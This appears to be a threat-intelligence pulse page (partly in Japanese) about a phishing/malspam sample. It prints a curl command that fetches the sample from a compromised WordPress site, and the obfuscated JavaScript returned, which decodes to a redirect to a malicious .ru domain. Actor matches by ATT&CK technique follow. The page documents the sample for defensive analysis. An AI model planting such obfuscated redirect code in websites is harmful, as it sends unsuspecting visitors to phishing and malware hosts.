Trusted Design

Gmail Phishing

概要

Possible malspam, calls script from healingprivatemall[.]ru; no particular evasion apparent beyond useragent; curl -A"Mozilla/5.0 (Windows NT 5.2; rv:2.0.1) Gecko/20100101 Firefox/4.0.1" http://thestuartsofvirginia[.]com/wp-content/plugins/weissmuller.php <script type="text/javascript"> function equale() { equala=19; equalb=[138,124,129,119,130,138,65,135,130,131,65,127,130,118,116,135,124,130,129,65,123,133,120,121,80,58,123,135,135,131,77,66,66,123,120,116,127,124,129,122,131,133,124,137,116,135,120,128,116,127,127,65,133,136,58,78]; equalc=""; for(equald=0;equald<equalb.length;equald++) { equalc+=String.fromCharCode(equalb[equald]-equala); } return equalc; } setTimeout(equale(),1253); </script> </body> Request Response GET /favicon.ico HTTP/1.1 Host: thestuartsofvirginia.com United States AS46606 Unified Layer 192.254.235.37 HTTP/1.0 200 OK Content-Type: image/x-icon GET / HTTP/1.1 Host: healingprivatemall[.]ru

Created: 2026-02-23

Indicators

Indicatorsは見つかっていない。

類似Pulses

このPulseに関連する脅威アクター (事実ベース)

Turla

Score: 4.57
Matched TTPs:
  • T1059.007 - JavaScript
  • T1124 - System Time Discovery
MITREへのリンク →

Sidewinder

Score: 4.57
Matched TTPs:
  • T1059.007 - JavaScript
  • T1124 - System Time Discovery
MITREへのリンク →

Contagious Interview

Score: 6.51
Matched TTPs:
  • T1059.007 - JavaScript
  • T1543.001 - Launch Agent
MITREへのリンク →

FIN7

Score: 4.57
Matched TTPs:
  • T1059.007 - JavaScript
  • T1124 - System Time Discovery
MITREへのリンク →

Higaisa

Score: 4.57
Matched TTPs:
  • T1059.007 - JavaScript
  • T1124 - System Time Discovery
MITREへのリンク →

Kimsuky

Score: 9.54
Matched TTPs:
  • T1059.007 - JavaScript
  • T1036.007 - Double File Extension
  • T1598 - Phishing for Information
MITREへのリンク →

Mustang Panda

Score: 6.11
Matched TTPs:
  • T1059.007 - JavaScript
  • T1036.007 - Double File Extension
MITREへのリンク →

Scattered Spider

Score: 6.88
Matched TTPs:
  • T1552.004 - Private Keys
  • T1598 - Phishing for Information
MITREへのリンク →

TeamTNT

Score: 3.44
Matched TTPs:
  • T1552.004 - Private Keys
MITREへのリンク →

Storm-0501

Score: 3.44
Matched TTPs:
  • T1552.004 - Private Keys
MITREへのリンク →

Rocke

Score: 3.44
Matched TTPs:
  • T1552.004 - Private Keys
MITREへのリンク →

Volt Typhoon

Score: 6.03
Matched TTPs:
  • T1552.004 - Private Keys
  • T1124 - System Time Discovery
MITREへのリンク →

Lazarus Group

Score: 7.13
Matched TTPs:
  • T1574.013 - KernelCallbackTable
  • T1124 - System Time Discovery
MITREへのリンク →

APT29

Score: 4.54
Matched TTPs:
  • T1090.004 - Domain Fronting
MITREへのリンク →

ZIRCONIUM

Score: 6.03
Matched TTPs:
  • T1598 - Phishing for Information
  • T1124 - System Time Discovery
MITREへのリンク →

APT28

Score: 7.57
Matched TTPs:
  • T1598 - Phishing for Information
  • T1550.001 - Application Access Token
MITREへのリンク →

Moonstone Sleet

Score: 3.44
Matched TTPs:
  • T1598 - Phishing for Information
MITREへのリンク →

Equation

Score: 4.13
Matched TTPs:
  • T1564.005 - Hidden File System
MITREへのリンク →

Strider

Score: 4.13
Matched TTPs:
  • T1564.005 - Hidden File System
MITREへのリンク →

HAFNIUM

Score: 4.13
Matched TTPs:
  • T1550.001 - Application Access Token
MITREへのリンク →

このPulseに関連する脅威アクター (推論ベース)

Kimsuky

Score: 0.76
Matched TTPs:
  • T1598 - Phishing for Information
  • T1036.007 - Double File Extension
  • T1059.007 - JavaScript
MITREへのリンク →

APT28

Score: 0.64
Matched TTPs:
  • T1550.001 - Application Access Token
  • T1598 - Phishing for Information
MITREへのリンク →

Lazarus Group

Score: 0.58
Matched TTPs:
  • T1574.013 - KernelCallbackTable
  • T1124 - System Time Discovery
MITREへのリンク →

Scattered Spider

Score: 0.56
Matched TTPs:
  • T1552.004 - Private Keys
  • T1598 - Phishing for Information
MITREへのリンク →

Related CVEs

このPulseに見つかったCVEはありません。

Pulse – 脅威アクター グラフ


← Pulse一覧に戻る